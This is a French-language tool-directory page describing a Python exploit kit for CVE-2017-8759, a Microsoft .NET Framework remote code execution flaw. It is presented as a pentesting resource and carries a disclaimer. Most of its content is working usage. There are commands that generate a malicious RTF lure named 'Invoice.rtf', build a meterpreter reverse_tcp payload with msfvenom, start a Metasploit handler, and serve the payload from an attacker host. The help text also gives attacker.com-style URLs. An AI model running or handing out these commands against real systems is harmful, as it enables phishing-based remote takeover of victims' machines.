Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-8759 — Exploit toolkit CVE-2017-8759 - v1.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. | Kitploit
Outils/GitHubGitHub/bhdresh/cve-2017-8759
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubbhdresh/cve-2017-8759

CVE-2017-8759

Voir le dépôt
312109il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Exploit toolkit CVE-2017-8759 - v1.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.

Partager

Kit d'exploit CVE-2017-8759 - v1.0

Le kit d'exploit CVE-2017-8759 - v1.0 est un script Python pratique qui offre aux pentesteurs et chercheurs en sécurité un moyen rapide et efficace de tester l'exécution de code à distance (RCE) du Microsoft .NET Framework. Il peut générer un fichier RTF malveillant et délivrer une charge utile metasploit / meterpreter / autre à la victime sans configuration complexe.

Avertissement

Ce programme est UNIQUEMENT à des fins éducatives. Ne l'utilisez pas sans autorisation. Les clauses de non-responsabilité habituelles s'appliquent, en particulier le fait que moi (bhdresh) ne suis pas responsable des dommages causés par l'utilisation directe ou indirecte des informations ou fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'accès Internet n'assume AUCUNE responsabilité pour le contenu ou l'utilisation abusive de ces programmes ou de tout dérivé de ceux-ci. En utilisant ce programme, vous acceptez le fait que tout dommage (perte de données, plantage du système, compromission du système, etc.) causé par l'utilisation de ces programmes n'est pas de la responsabilité de bhdresh.

Enfin, il s'agit d'un développement personnel, veuillez respecter sa philosophie et ne pas l'utiliser pour de mauvaises choses !

Licence

Licence CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

Note de version :

Capacités suivantes introduites dans le script

root@kitploit:~
- Générer un fichier RTF malveillant
- Mode d'exploitation pour le fichier RTF généré

Version : Python version 2.7.13

Scénario : Délivrer une charge utile meterpreter locale

Tutoriel vidéo : https://www.youtube.com/watch?v=46jEa1bmORM
Exemples de commandes
root@kitploit:~
1) Générer un fichier RTF malveillant
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optionnel, si vous utilisez la charge utile MSF) : Générer la charge utile metasploit et démarrer le handler
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Démarrer le kit en mode exploitation pour délivrer la charge utile locale
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

Arguments de la ligne de commande :

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

Ceci est un kit pratique pour exploiter CVE-2017-8759 (Microsoft .NET Framework RCE)

Modes :

-M gen                                          Générer uniquement le fichier malveillant

     Générer un fichier RTF malveillant :

      -w <Filename.rtf>                   Nom du fichier RTF malveillant (Partagez ce fichier avec la victime).

      -u <http://attacker.com/test.txt>   Chemin du fichier txt distant. Normalement, cela doit être un domaine ou une IP où cet outil est en cours d'exécution.
                                          Par exemple, http://attackerip.com/test.txt (Cette URL sera incluse dans le fichier RTF malveillant et sera demandée une fois que la victime ouvrira le fichier RTF malveillant).

-M exp                                          Démarrer le mode exploitation

     Exploitation :
  
      -p <TCP port:Default 80>            Numéro de port local.

      -e <http://attacker.com/shell.exe>  Chemin d'un fichier exécutable / shell meterpreter / charge utile qui doit être exécuté sur la cible.

      -l </tmp/shell.exe>                 Spécifiez le chemin local d'un fichier exécutable / shell meterpreter / charge utile.

Auteur

@bhdresh

Crédits

@Voulnet, @vysec, @bhdresh

Bugs, problèmes, demandes de fonctionnalités

Évidemment, je ne suis pas un développeur à temps plein, alors attendez-vous à quelques problèmes.

Veuillez signaler les bugs et problèmes via https://github.com/bhdresh/CVE-2017-8759/issues/new

Télécharger l’outil